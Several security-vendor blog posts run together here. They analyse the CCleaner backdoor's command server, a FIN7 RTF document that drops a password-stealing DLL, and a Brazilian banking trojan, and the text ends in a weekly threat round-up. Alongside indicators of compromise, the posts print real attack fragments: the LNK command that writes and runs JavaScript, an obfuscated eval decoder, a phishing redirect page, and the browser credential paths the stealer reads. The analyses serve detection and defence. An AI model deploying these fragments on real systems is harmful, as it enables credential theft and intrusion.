This post was authored by Edmund Brumaghin, Earl Carter, Warren Mercer, Matthew Molyett, Matthew Olney, Paul Rascagneres and Craig Williams.

Note: This blog post discusses active research by Talos into a new threat. This information should be considered preliminary and will be updated as research continues.

Introduction

Talos recently published a technical analysis of a backdoor which was included with version 5.33 of the CCleaner application. During our investigation we were provided an archive containing files that were stored on the C2 server. Initially, we had concerns about the legitimacy of the files. However, we were able to quickly verify that the files were very likely genuine based upon the web server configuration files and the fact that our research activity was reflected in the contents of the MySQL database included in the archived files.

In analyzing the delivery code from the C2 server, what immediately stands out is a list of organizations, including Cisco, that were specifically targeted through delivery of a second-stage loader. Based on a review of the C2 tracking database, which only covers four days in September, we can confirm that at least 20 victim machines were served specialized secondary payloads. Below is a list of domains the attackers were attempting to target.


Interestingly the array specified contains Cisco's domain (cisco.com) along with other high-profile technology companies. This would suggest a very focused actor after valuable intellectual property.

These new findings raise our level of concern about these events, as elements of our research point towards a possible unknown, sophisticated actor. These findings also support and reinforce our previous recommendation that those impacted by this supply chain attack should not simply remove the affected version of CCleaner or update to the latest version, but should restore from backups or reimage systems to ensure that they completely remove not only the backdoored version of CCleaner but also any other malware that may be resident on the system.

Technical Details

Web Server

The contents of the web directory taken from the C2 server included a series of PHP files responsible for controlling communications with infected systems. The attacker used a symlink to redirect all normal traffic requesting 'index.php' to the 'x.php' file, which contains the malicious PHP script.

In analyzing the contents of the PHP files, we identified that the server implemented a series of checks to determine whether to proceed with standard operations or simply redirect to the legitimate Piriform web site. The contents of the HTTP Host header, the request method type, and the server port are checked to confirm that they match what is expected from beacons sent from infected systems.

The PHP contains references to the required table for information storage within the 'x.php' variables as defined:

Within 'init.php' the $db_table is declared to allow insertion into the required database on the attacker infrastructure. This is 'Server' as defined below.

The web server also contains a second PHP file (init.php) that defines core variables and operations used. Interestingly, this configuration specifies "PRC" as the time zone, which corresponds with People's Republic of China (PRC). It’s important to note that this cannot be relied on for attribution. It also specifies the database configuration to use, as well as the filename and directory location to use for the variable $x86DllName.

The following information is gathered from infected systems, which is later used to determine how to handle those hosts. This includes OS version information, architecture information, whether the user has administrative rights, as well as the hostname and domain name associated with the systems.

The system profile information was rather aggressive and included specific information such as a list of software installed on the machine and all current running processes on the machine with no surprise that 'CCleaner.exe' was a current running process on the victim machine. The system profile information is then stored in the MySQL database.

There is also functionality responsible for loading and executing the Stage 2 payload on systems that meet the predefined requirements, similar to functionality that we identified would be required in our previous analysis of Stage 1. While there is shellcode associated with both x86 and x64 PE delivery, it appears that only the x86 PE loading functionality is actually utilized by the C2 server.

And below is the shellcode associated with the x64 version of the PE Loader.

The PHP script later compares the system beaconing to the C2 to three values: $DomainList, $IPList, and $HostList. This is to determine if the infected system should be delivered a Stage 2 payload. Below is condensed PHP code that demonstrates this:

The use of domain-based filtering further indicates the targeted nature of this attack. While we have confirmed that the number of systems affected by the backdoor was large based upon beacon information stored within the MySQL database, the attackers were specifically controlling which infected systems were actually delivered a Stage 2 payload. While it was reported that no systems executed a Stage 2 payload, this is not accurate. In analyzing the database table storing information on the systems that were delivered a Stage 2 payload, we identified 20 unique hosts that may have been affected by this payload. The functionality present within Stage 2 is documented in the "Stage 2 Payloads" section of this post.

MySQL Database

The C2 MySQL database held two tables: one describing all machines that had reported to the server and one describing all machines that received the second-stage download, both of which had entries were dated between Sept. 12th and Sept. 16th. Over 700,000 machines reported to the C2 server over this time period, and more than 20 machines have received the second-stage payload. It is important to understand that the target list can be and was changed over the period the server was active to target different organizations.

During the compromise, the malware would periodically contact the C2 server and transmit reconnaissance information about infected systems. This information included IP addresses, online time, hostname, domain name, process listings, and more. It's quite likely this information was used by the attackers to determine which machines they should target during the final stages of the campaign.

The main connection data is stored in the "Server" table. Here is an example of one of Talos' hosts in that database table:

In addition, the compromised machines would share a listing of installed programs.

A process list was also captured.

When combined, this information would be everything an attacker would need to launch a later stage payload that the attacker could verify to be undetectable and stable on a given system.

A second database table, separate from the 'Server' database table, contained an additional information set that was associated with systems that had actually been delivered the Stage 2 payload. This table contained similar survey information to the 'Server' database table, the structure of which is shown below:

In analyzing this second database table 'OK', we can confirm that after deduplicating entries, 20 systems were successfully delivered the Stage 2 payload. Talos reached out to the companies confirmed affected by this Stage 2 payload to alert them of a possible compromise.

Based on analysis of the 'Server' database table, it is obvious this infrastructure provides attackers access to a variety of different targets. Given the filtering in place on the C2 server, the attackers could add or remove domains at any given time, based upon the environments or organizations they choose to target. To provide additional perspective regarding the types of systems that the attackers could choose to further compromise, the screenshot below shows the number of total entries that were contained within the database table used to store system profile information:

The following screenshot shows the number of affected government systems around the world.

Likewise, looking at compromised systems belonging to domains containing the word 'bank' returns the following results:

This demonstrates the level of access that was made available to the attackers through the use of this infrastructure and associated malware and further highlights the severityand potential impact of this attack.

Stage 2 Payloads

The stage 2 installer is GeeSetup_x86.dll. This installer checks the OS version and then drops either a 32-bit or 64-bit version of a trojanized tool. The x86 version is using a trojanized TSMSISrv.dll, which drops VirtCDRDrv (which matches the filename of a legitimate executable that is part of Corel) using a similar method to the backdoored CCleaner tool. The x64 version drops a trojanized EFACli64.dll file named SymEFA which is the filename taken from a legitimate executable that is part of "Symantec Endpoint". None of the files that are dropped are signed or legitimate.

Effectively, they patch a legitimate binary to package their malware. Additionally, the setup put an encoded PE in the registry :

HKLM\Software\Microsoft\Windows NT\CurrentVersion\WbemPerf\001
HKLM\Software\Microsoft\Windows NT\CurrentVersion\WbemPerf\002
HKLM\Software\Microsoft\Windows NT\CurrentVersion\WbemPerf\003
HKLM\Software\Microsoft\Windows NT\CurrentVersion\WbemPerf\004

The purpose of the trojanized binary is to decode and execute this PE in registry. This PE performs queries to additional C2 servers and executes in-memory PE files. This may complicate detection on some systems since the executable files are never stored directly on the file system.

Within the registry is a lightweight backdoor module which is run by the trojanized files. This backdoor retrieves an IP from data stegged into a github.com or wordpress.com search, from which an additional PE module is downloaded and run.

Code Reuse

Talos has reviewed claims from Kaspersky researchers that there is code overlap with malware samples known to be used by Group72. While this is by no means proof in terms of attribution, we can confirm the overlap and we agree that this is important information to be considered.

On the left: 2bc2dee73f9f854fe1e0e409e1257369d9c0a1081cf5fb503264aa1bfe8aa06f (CCBkdr.dll)

On the right: 0375b4216334c85a4b29441a3d37e61d7797c2e1cb94b14cf6292449fb25c7b2 (Missl backdoor - APT17/Group 72)

Conclusion

Supply chain attacks seem to be increasing in velocity and complexity. It's imperative that as security companies we take these attacks seriously. Unfortunately, security events that are not completely understood are often downplayed in severity. This can work counter to a victim's best interests. Security companies need to be conservative with their advice before all of the details of the attack have been determined to help users ensure that they remain protected. This is especially true in situations where entire stages of an attack go undetected for a long period of time. When advanced adversaries are in play, this is especially true. They have been known to craft attacks that avoid detection by specific companies through successful reconnaissance techniques.

In this particular example, a fairly sophisticated attacker designed a system which appears to specifically target technology companies by using a supply chain attack to compromise a vast number of victims, persistently, in hopes to land some payloads on computers at very specific target networks.

Coverage

Additional ways our customers can detect and block this threat are listed below.


Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.

CWS or WSA web scanning prevents access to malicious websites and detects malware used in these attacks.

AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

Indicators of Compromise (IOCs)

Below are indicators of compromise associated with this attack.

Installer on the CC: dc9b5e8aa6ec86db8af0a7aa897ca61db3e5f3d2e0942e319074db1aaccfdc83 (GeeSetup_x86.dll)

64-bit trojanized binary: 128aca58be325174f0220bd7ca6030e4e206b4378796e82da460055733bb6f4f (EFACli64.dll)

32-bit trojanized binary: 07fb252d2e853a9b1b32f30ede411f2efbb9f01e4a7782db5eacf3f55cf34902 (TSMSISrv.dll)

DLL in registry: f0d1f88c59a005312faad902528d60acbf9cd5a7b36093db8ca811f763e1292a

Registry Keys:

• HKLM\Software\Microsoft\Windows NT\CurrentVersion\WbemPerf\001
• HKLM\Software\Microsoft\Windows NT\CurrentVersion\WbemPerf\002
• HKLM\Software\Microsoft\Windows NT\CurrentVersion\WbemPerf\003
• HKLM\Software\Microsoft\Windows NT\CurrentVersion\WbemPerf\004
• HKLM\Software\Microsoft\Windows NT\CurrentVersion\WbemPerf\HBP

Stage 2 Payload (SHA256):

dc9b5e8aa6ec86db8af0a7aa897ca61db3e5f3d2e0942e319074db1aaccfdc83

This post was authored by Michael Gorelik and Josh Reynolds

Executive Summary

Throughout this blog post we will be detailing a newly discovered RTF document family that is being leveraged by the FIN7 group (also known as the Carbanak gang) which is a financially-motivated group targeting the financial, hospitality, and medical industries. This document is used in phishing campaigns to execute a series of scripting languages containing multiple obfuscation mechanisms and advanced techniques to bypass traditional security mechanisms. The document contains messages enticing the user to click on an embedded object that executes scripts which are used to infect the system with an information stealing malware variant. This malware is then used to steal passwords from popular browsers and mail clients which are sent to remote nodes that are accessible to the attackers. These advanced mechanisms and the information stealing malware will be discussed in detail. We will also review a number of static and dynamic detection mechanisms used in the AMP for Endpoints and Threat Grid product lines to detect these document families.

Introduction

On June 9th, 2017 Morphisec Labpublished a blog post detailing a new infection vector technique using an RTF document containing an embedded JavaScript OLE object. When clicked it launches an infection chain made up of JavaScript, and a final shellcode payload that makes use of DNS to load additional shellcode from a remote command and control server. In this collaboration post with Morphisec Lab and Cisco's Research and Efficacy Team, we are now publishing details of this new document variant that makes use of an LNK embedded OLE object, which extracts a JavaScript bot from a document object, and injects a stealer DLL in memory using PowerShell. The details we are releasing are to provide insight into attack methodologies being employed by sophisticated groups such as FIN7 who are consistently changing techniques between attacks to avoid detection, and to demonstrate the detection capabilities of the AMP for Endpoints and Threat Grid product lines. This is relevant to the constantly changing threats that are affecting multiple types of industries on a daily basis.

Infection Vector

The dropper variant that we encountered makes use of an LNK file to execute wscript.exe with the beginning of the JavaScript chain from a word document object:

C:\Windows\System32\cmd.exe..\..\..\Windows\System32\cmd.exe /C set x=wsc@ript /e:js@cript %HOMEPATH%\md5.txt & echo try{w=GetObject("","Wor"+"d.Application");this[String.fromCharCode(101)+'va'+'l'](w.ActiveDocument.Shapes(1).TextFrame.TextRange.Text);}catch(e){}; >%HOMEPATH%\md5.txt & echo %x:@=%|cmd

This chain involves a substantial amount of base64 encoded JavaScript files that make up each component of the JavaScript bot. It also contains the reflective DLL injection PowerShell code to inject an information stealing malware variant DLL which will be discussed further.

JavaScript Comparisons

Clustering Decoded JavaScript Functionality

A single one of these documents can produce as many as 40 JavaScript files. In order to identify similar techniques, we decided to use entropy of a given JavaScript file, and the base64 decoding depth to cluster files within a scatter plot with theggplot andggiraph R libraries.

Before we demonstrate our analysis results, we will explain the values used for plotting and clustering of the JavaScript files.

Base64 Encodings

The majority of the JavaScript obfuscation is nested base64 encodings. Base64 is a binary to text encoding scheme which can be used to represent any type of data. In the case of these documents it is used to encode JavaScript functionality multiple times, likely in order to avoid common analysis techniques employed by traditional anti-virus software which only emulate JavaScript instructions for a limited amount of iterations. The base64 blobs are hardcoded, or comma separated, which are then concatenated and decoded making up the next JavaScript code to be executed. It is decoded using an CDO.Message ActiveXObject invocation and specifying the ContentTransferEncoding to be base64 (note that the windows-1251 charset is Cyrillic, which may indicate Russian origin):

function b64dec(data){

    var cdo = new ActiveXObject("CDO.Message");
    var bp = cdo.BodyPart;
    bp.ContentTransferEncoding = "base64";
    bp.Charset = "windows-1251";
    var st = bp.GetEncodedContentStream();
    st.WriteText(data);
    st.Flush();
    st = bp.GetDecodedContentStream();
    st.Charset = "utf-8";
    return st.ReadText;
}

This is then evaluated using an obfuscated function invocation, E.G:

MyName.getGlct()[String.fromCharCode(101)+'va'+'l'](b64dec(energy));

These base64 decoding steps lead to various execution branches of JavaScript bot functionality, and the injection of a stealer DLL into memory:
Figure 1: Detailed Document Infection Chain Using JavaScript and DLL Injection

JavaScript Entropy

Entropy involves the calculation of disorder and uncertainty within a given amount of data. In this case, we are interested in associating extracted JavaScript files based on this calculation, since variations of these documents contain similar functionality, but employed obfuscation mechanisms makes clustering them difficult. We used the following calculation fromEro Carrera's blog in Python:

import math 

def H(data): 
    if not data: 
        return 0 
    entropy = 0 
    for x in range(256): 
        p_x = float(data.count(chr(x)))/len(data) 
        if p_x > 0: 
           entropy += - p_x*math.log(p_x, 2) 
    return entropy

This calculation is done for each JavaScript file and is the X axis of our scatter plots that will be described in the next section.

Scatter Plot for Clustering & JavaScript Functionality

We began with an initial set of documents which did not contain a dropper DLL. We then calculated the amount of base64 decoding required to produce each file (Y axis) and calculated their respective entropy (X axis). We then reviewed each scatter plot grouping and labeled their respective functionality in red:
Figure 2: Scatter plot using entropy and base64 decoding depth

There are a number of conclusions from the scatter plot:

1. The higher depth of base64 decoding shows more interesting functionality (to be expected)
2. The bot functionality and C2 contact JavaScript is within multiple sets of files at close decoding depths and entropy
3. The task scheduling functionality vary in depth and entropy (two separate cases)

We then applied the same technique to the second generation of documents which ship an entire base64 encoded and compressed DLL:
Figure 3: Scatter plot of PowerShell DLL documents

The outliers are the decoded DLLs and XML task files. When these components are removed from the scatter plot (leaving only JavaScript) we see similar clusters to the first generation of documents:
Figure 4: Modified Plot of PowerShell DLL Documents

Based on the number of clusters and range of entropy we see that this generation of documents contain more files with varying functionality and depth. This plotting technique also provides a method of identifying new functionality by showing outliers, such as the labeled PS Outlier which contains an array of encoded PowerShell bytes rather than a blob that provides the final PowerShell for DLL injection:
Figure 5: Identified New PowerShell Functionality Due to Entropy Outlier

JavaScript Obfuscation Changes

Once similar functionality has been clustered, the changes made between generated documents become apparent. Variable names and GUID paths are changed:
Figure 6: Variables and Path GUID JS Changes

This functionality also highlights an interesting obfuscation mechanism that some emulation engines may ignore. The function body of the evaluated JavaScript appears to be within a multi-line comment, however, in reality this is evaluated as a multi-line string. This can be seen below when tested in Chrome's scripting console:
Figure 7: JavaScript Multi-Line Comment String Obfuscation

Functions are re-ordered:
Figure 8: Reordered Function Example

Command and Control addresses are changed:
Figure 9: Changed Command and Control Addresses

Varying base64 encoding depths, which can be identified using our scatter plot, such as the PowerShell write and execution functionality:
Figure 10: PowerShell Write and Execute Functionality at Different Base64 Decoding Depths

Which when compared vary in decoding depth but are the same functionality:
Figure 11: Code Comparison PowerShell Write and Execute Functionality

 

 Stealer DLL

Recovering the DLL

One of the final components of these JavaScript 'decoding chains' is a PowerShell reflective DLL injection script which contains copy pasted functions fromPowersploit's Invoke-ReflectivePEInjection. The DLL is de-obfuscated by decoding the base64 blob and uses IO.Compression.DeflateStream to decompress the resulting bytes. In order to recover the DLL we can simply write the decompressed bytes to disk using [io.file]::WriteAllBytes.
Figure 12: PowerShell stream decompression and writing DLL to disk
Figure 13: Copy-Pasted PowerSploit Invoke-ReflectivePEInjection Code

Stealer DLL Functionality

We wrote a blog post about the H1N1 dropper in August 2016, whichreferenced a string de-obfuscation script to handle multiple 32-bit value XOR, ADD, and SUB string obfuscation techniques. This script is able to handle similar functionality in this stealer DLL:
Figure 14: Firefox String Decoding

Import hashing functionality involves resolving the export table for a given DLL (common for packers/malware):
Figure 15: PowerShell Injected DLL Hashing Functionality PE Offsets

Then using XOR and ROL algorithm over given export values to compare against given hashes for exports to resolve:
Figure 16: PowerShell Injected DLL Hashing Algorithm

This DLL also contains similar stealer functionality, E.G the decryption of Intelliform data using CryptUnprotectData by hashing cached URLs:
Figure 17: PowerShell Injected DLL Intelliform Data Stealing

This binary also contains Outlook and Firefox stealer functionality and the ability to steal login information from Google Chrome, Chromium, forks of Chromium and Opera browsers that will be discussed in the next section.

Chrome, Chromium and Opera Credential Stealing

The Chrome, Chromium, Chromium forks and Opera credential stealing functionality opens the [Database Path]\Login Data sqlite3 database, reads the URL, username, and password fields, and calls CryptUnprotectData to decrypt user passwords. The following paths are checked for this database under %APPDATA%, %PROGRAMDATA%, and %LOCALAPPDATA%:

• \Google\Chrome\User Data\Default\Login Data
• \Chromium\User Data\Default\Login Data
• \MapleStudio\ChromePlus\User Data\Default\Login Data
• \YandexBrowse\User Data\Default\Login Data
• \Nichrom\User Data\Default\Login Data
• \Comodo\Dragon\User Data\Default\Login Data

Although Opera is not a fork of Chromium, the newest version has credentials with the same implementation under the path: \Opera Software\Opera Stable\Login Data

Stolen Data Command and Control

In addition to the JavaScript bot functionality, the stolen data is dumped to %APPDATA%\%USERNAME%.ini and sets the file creation time to be that of ntdll.dll. This data is read and encrypted using the SimpleEncrypt function, which as their name implies, is a simple substitution cipher:
Figure 18: Command and Control Data Substitution Cipher

This is then POSTed to a hardcoded command and control addresses, including the Google Apps Script hosting service (also notice the alfIn variable declaration which is the alphabet used for the substitution cipher):
Figure 19: Command and Control Data Exfiltration JavaScript Functionality

This is again using the comment block evasion technique.

AMP Coverage

The AMP for Endpoints and Threat Grid product lines are ideal for dealing with this threat, as they can use both static and dynamic activity to detect malicious activity.

AMP Threat Grid

Without clicking on the embedded OLE object within the document Threat Grid can provide insight into possible malicious activity using static attributes alone. Embedded functionality is automatically extracted by Threat Grid, in this instance the embedded LNK OLE object contains seemingly malicious commands that are executed when clicked:
Figure 20: Document LNK Command Prompt Static Attributes
Figure 21: Active Document LNK Static Attributes

The OLE object can be clicked on within the document during the Threat Grid run using the Open Embedded Object in Word Document playbook, which will automatically execute the embedded object during the Threat Grid run when selected from the submission dropdown menu:
Figure 22: Selecting Playbook from Submission Menu

A depiction of this automated user interaction can be seen below:
Figure 23: Clicking on Document OLE Object Through Playbook

When clicked additional behavioral indicators are triggered based on dynamic behavior:
Figure 24: Dynamic Activity Caused by Clicking the OLE Object

Task creations (used by the JavaScript bot for periodic execution of components) can also be observed:
Figure 25: Task Creation Dynamic Activity

The JavaScript content that is periodically executed can be seen the Artifacts section and can be downloaded or resubmitted for further analysis:
Figure 26: Written JavaScript Artifact Objects

This intelligence is then integrated back into the AMP cloud protecting all customers who may be targeted by similar attack methodologies.

AMP for Endpoints

AMP for Endpoints has the ability to observe dynamic activity through a number of methods. One of these is the capture of command line arguments which are then sent to the AMP cloud for analysis. In this case, we're able to observe the execution of wscript.exe when the OLE object is clicked:

Figure 27: Captured Command Line Arguments in AMP for Endpoints Device Trajectory

This triggers an Indicator of Compromise which can then be further investigated:

Figure 28: Indicator of Compromise from Captured Command Line Arguments

Conclusion

The FIN7 group is an example of an advanced adversary targeting a variety of industries using conventional technologies that ship with most versions of Microsoft Windows. Through the use of Microsoft Word documents to ship entire malware platforms they have the ability to leverage scripting languages to access ActiveX controls, and "file-less" techniques to inject shipped portable executables into memory using PowerShell without ever having the portable executable touch disk. Clustering JavaScript also demonstrates a number of ways FIN7 makes minor changes between releases, and establishes outliers to observe major changes. Through the observation of static and dynamic attributes we're able to establish indicators of compromise based on the embedded OLE object which can be used to identify FIN7 documents, and identify documents which may be leveraging similar functionality to protect our customers.

Coverage

Talos has released the following Snort rule(s) to address this threat. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Firepower customers should use the latest update to their ruleset by updating their SRU. Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

Snort Rules: 44430-44433

Additional ways our customers can detect and block this threat are listed below.


Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.
CWS orWSA web scanning prevents access to malicious websites and detects malware used in these attacks.
Email Security can block malicious emails sent by threat actors as part of their campaign.

Network Security appliances such as NGFW, NGIPS, and Meraki MX can detect malicious activity associated with this threat.
AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.
Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

Indicators of Compromise

JavaScript Bot Documents

6bc8770206c5f2bb4079f7583615adeb4076f2e2d0c655fbafedd9669dc3a213
df22408833b2ae58f0d3e2fe87581be31972ef56e0ebf5efafc4e6e0341b5521
2b4991b2a2792436b50404dcf6310ef2af2573505810ebac08e32f17aee3fbbe
ebca565e21a42300e19f250f84b927fa3b32debf3fe13003a4aa5b71ed5cbee9
6604d806eb68fdf914dfb6bbf907a4f2bd9b8757fc4da4e7c5e4de141b8d4e2c

JavaScript Bot Documents with PowerShell DLL Injection

91f028b1ade885bae2e0c6c3be2f3c3dc692830b45d4cf1a070a0bd159f1f676
ad578311d43d3aea3a5b2908bc6e408b499cc832723225ff915d9a7bc36e0aa4
fadb57aa7a82dbcb2e40c034f52096b63801efc040dd8559a4b8fc873bc962a1
91f028b1ade885bae2e0c6c3be2f3c3dc692830b45d4cf1a070a0bd159f1f676
74a5471c3aa6f9ce0c806e85929c2816ac39082f7fea8dbe8e4e98e986d4be78
f73c7ed3765fec13ffd79aef97de519cfbd6a332e81b8a247fe7d1ccb1946c9c

Command and Control IPs

104[.]232[.]34[.]36
5[.]149[.]253[.]126
185[.]180[.]197[.]20
195[.]54[.]162[.]79
31[.]148[.]219[.]18

Google Apps Script Command and Control URLs

hXXps://script[.]google[.]com/macros/s/AKfycbxvGGF-QBkaNIWCBFgjohBtkmyfyRpvm91yCGEvzgDvAJdqfW8_/exec
hXXps://script[.]google[.]com/macros/s/AKfycbz6dmNJfCPwFchoq6WkJsMjQu22SJTJ9pxMUeQR7bCpmJhW6Bg2/exec
hXXps://script[.]google[.]com/macros/s/AKfycbwkNc-8rk0caDWO5I4KMymvOXVinfOpR1eevZ63xiXDvcoqOE6p/exec
hXXps://script[.]google[.]com/macros/s/AKfycbxyiIBW9SHUFV4S5JM6IW-dmVADFOrTJDM7bZspeBf2Kpf4IN0/exec

This post was authored by Warren Mercer, Paul Rascagneres and Vanja Svajcer

Introduction

Banking trojans are among some of the biggest threats to everyday users as they directly impact the user in terms of financial loss. Talos recently observed a new campaign specific to South America, namely Brazil. This campaign was focused on various South American banks in an attempt to steal credentials from the user to allow for illicit financial gain for the malicious actors. The campaign Talos analysed focused on Brazilian users and also attempted to remain stealthy by using multiple methods of re-direction in an attempt to infect the victim machine. It also used multiple anti-analysis techniques and the final payload was written in Delphi which is quite unique to the banking trojan landscape.

Infection Vector

Spam Example

As with a lot of banking trojan campaigns, this one starts with a malicious spam campaign. Here is an example of an email used during this campaign. The attacker used an email written in Portuguese which makes it seemingly more legitimate for the user - receiving email in a native language gives the attackers a higher likelihood of achieving their mission objective, convincing the victim to open the malicious attachment.



The email contains an HTML attachment named BOLETO_2248_.html, a Boleto refers to a type of invoice used in Brazil. The HTML document contains a simple redirection to a first website:

<html>

<head>

<title>2Via Boleto</title>

</head>

<body>

</body>

</html>

<meta http-equiv="refresh" content="0; url=http://priestsforscotland[.]org[.]uk/wp-content/themes/blessing/0032904.php">

Redirection, Redirection and… Redirection

The URL contained in the HTML attachment is a first redirect to a goo.gl URL shortener:



A second redirect is performed by the goo.gl URL. This shortened URL points to hxxp://thirdculture[.]tv:80/wp/wp-content/themes/zerif-lite/97463986909837214092129.rar.



Finally, the archive contains a JAR file named BOLETO_09848378974093798043.jar. If the user double clicks on the JAR file, java will execute the malicious code and will start the installation process of this banking trojan.

Java Execution

The first step of the Java code is to setup the working environment of the malware and to download additional files from hxxp://104[.]236[.]211[.]243/1409/pz.zip. The malware is working in the C:\Users\Public\Administrator\ directory which it creates as this is not a default folder. The new archive contains a new set of binaries.



On the last step, the Java code renames the downloaded binaries and executes vm.png (previously renamed):

Malware Loading

The first executed binary is vm.png. It's a legitimate binary from VMware and is signed with a VMware digital signature.



One of the dependencies of the binary is vmwarebase.dll:

Python 2.7.12 (default, Nov 19 2016, 06:48:10)
[GCC 5.4.0 20160609] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import pefile
>>> pe = pefile.PE("vm.png")
>>> for entry in pe.DIRECTORY_ENTRY_IMPORT:
...   print entry.dll

...

MSVCR90.dll
ADVAPI32.dll
vmwarebase.DLL
KERNEL32.dll

The vmwarebase.dll is not the legitimate binary but a malicious binary. This technique has been used previously by other actors such as PlugX. The idea behind this approach is that some security products have the following trust chain: if a first binary is trusted (vm.png in our case), the loaded libraries are automatically trusted. The loading technique can bypass some security checks.

The purpose of the vmwarebase.dll code is to inject and execute the prs.png code in explorer.exe or in notepad.exe depending on the context of the user account. The injection is performed by allocating memory in the remote process and the usage of LoadLibrary() to load the gbs.png library. The API usage is obfuscated by encryption (AES):



Once decrypted the m5ba+5jOiltH7Mff7neiMumHl2s= is LoadLibraryA and QiF3gn1jEEw8XUGBTz0B5i5nkPY= is kernel32.dll

Banking Trojan

The main module of the banking trojan contains a lot of features. For example, it will attempt to terminate analyst processes such as taskmgr.exe (Task Manager), msconfig.exe (MsConfig), regedit.exe (Registry Editor) and ccleaner.exe and ccleaner64.exe. This module creates a autostart registry key which attempts to use a legitimate looking name: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Vmware Base.

This module is used to get the title of the window in the foreground of the user. The purpose is to identify if the user has a windows with one the following title (these strings are encrypted in the sample):

Navegador Exclusivo Sicoobnet Aplicativo Ita Internet Banking BNB Banestes Internet Banking Banrisul bb.com.br bancobrasil.com Banco do Brasil Autoatendimento Pessoa Física - Banco do Brasil internetbankingcaixa Caixa - A vida pede mais que um banco SICREDI Banco Bradesco S/A Internet Banking 30 horas Banestes Internet Banking Banrisul

This list contains the targeted financial institutions located in Brazil. This trojan leveraged Web Injects to allow them to interact with the banking website. Another task performed by this main module is to execute the last binary: gps.png (renamed previously with the .drv extension) with rundll32.exe:



This library is packed using Themida which has made it significantly difficult to unpack.

The following debug strings were left in the samples analysed by the developer. The strings are in Portuguese:

<|DISPIDA|>Iniciou!
<|PRINCIPAL|>
<|DISPIDA|>Abriu_IE
<|Desktop|>
<|DISPIDA|>Startou!
<|Enviado|>

These strings are sent to the C2 server when specific actions are performed on the infected system. The C2 configuration is stored in the i.dk plain text file (encrypted in AES 256). This file contains a date, an IP and additional configuration items:

07082017
191.252.65.139
6532

Conclusion

Banking trojans continue to form part of the threat landscape, they continually evolve and also can, like this specific example, be very specific to the region they are attacking. This often doesn't suggest the attackers are from that region but they have decided that there is perhaps less security conscious users living there. Financial gain will continue to be a huge motivator for attackers and as with this sample the evolution of the malware continues to grow. Using commercial packing platforms like Themida will continue to make analysis difficult for analysts and shows that some attackers are willing to obtain these types of commercial packers in an attempt to thwart analysis.

IOCs

927d914f46715a9ed29810ed73f9464e4dadfe822ee09d945a04623fa3f4bc10 HTML attachment

5730b4e0dd520caba11f9224de8cfd1a8c52e0cc2ee98b2dac79e40088fe681c RAR archive

B76344ba438520a19fff51a1217e3c6898858f4d07cfe89f7b1fe35e30a6ece9 BOLETO_09848378974093798043.jar

0ce1eac877cdd87fea25050b0780e354fe3b7d6ca96c505b2cd36ca319dc6cab gbs.png

6d8c7760ac76af40b7f9cc4af31da8931cef0d9b4ad02aba0816fa2c24f76f10 i.dk

56664ec3cbb228e8fa21ec44224d68902d1fbe20687fd88922816464ea5d4cdf prs.png

641a58b667248fc1aec80a0d0e9a515ba43e6ca9a8bdd162edd66e58703f8f98 pz.zip

79a68c59004e3444dfd64794c68528187e3415b3da58f953b8cc7967475884c2 vm.png

969a5dcf8f42574e5b0c0adda0ff28ce310e0b72d94a92b70f23d06ca5b438be vmwarebase.dll

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between September 22 and September 29. As with previous round-ups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavior characteristics, indicators of compromise, and how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of date of publication. Detection and coverage for the following threats is subject to updates pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

The most prevalent threats highlighted in this round up are:

• Doc.Downloader.Jrat-6336393-1
  Downloader
  Malicious Office documents containing an embedded OLE object which can be an executable or Java JAR module mainly to contact certain domain and download additional malicious code
   
• Doc.Dropper.Agent-6336814-0
  Office Macro Downloader
  This is an obfuscated Office Macro downloader that attempts to download a malicious payload executable.
   
• Doc.Macro.DownloadExe-6336397-0
  Office Macro
  This set of downloaders use hardcoded URLs to download and execute a sample on the machine. The VBA contains no obfuscation and contains just enough functionality to accomplish its task.
   
• Doc.Macro.VBSDownloader-6336817-0
  Downloader
  The macros in these Word documents are base64 encoded and, when executed, download additional malicious files from an obfuscated list of URLs.
   
• Win.Ransomware.TorrentLocker-6336835-0
  Ransomware
  TorrentLocker uses AES encryption to encrypt files on an infected host before demanding a ransom payment in Bitcoin. Code is unpacked from a series of strings through character replacement, selective subset parsing, and a final conversion that is written to the stack for later execution. Spawned child processes and additional binary drops follow afterward.
   
• Win.Spyware.CCBkdr-6336251-2
  APT Supply chain attack
  Version 5.33 of CCleaner was compromised before vendor signing and was distributed with a backdoor module embedded. More information available at http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html and http://blog.talosintelligence.com/2017/09/ccleaner-c2-concern.html
   
• Win.Trojan.Beeldeb-6336738-0
  Trojan
  Win.Trojan.Beeldeb-6336738-0 is a self-executing AutoIT script. The malware payload is injected into a dropped executable. Further, the malware adds itself to the startup folder for persistence.
   
• Win.Trojan.Cossta-237
  Trojan
  Win.Trojan.Cossta-237 is a trojan that will download additional files and potentially receive further instructions from its operator.
   
• Win.Worm.Untukmu-5949608-0
  Worm
  This worm is highly malicious and contains several anti-analysis mechanisms such as anti-debugging techniques as well as to avoid its removal also in SafeBoot. After the infection it gains persistence and disable cmd and the registry editor.
   

---

Threats

Doc.Downloader.Jrat-6336393-1

Indicators of Compromise

Registry Keys

• N/A

Mutexes

• N/A

IP Addresses

• N/A

Domain Names

• mike22[.]linkpc[.]net

Files and or directories created

• %AppData%\Microsoft\Office\Recent\ITT Tender - ABB -3600002386- Provision of Supply and Installation.LNK

File Hashes

• 1508a8ab14c4639853c9f2e598a142756517bd078f505274b5783ddda8fed0a0
• 1570586012e23a7de3a8fd965bdc2d3a96175fd8a77d284827c1ed6d58944a7e
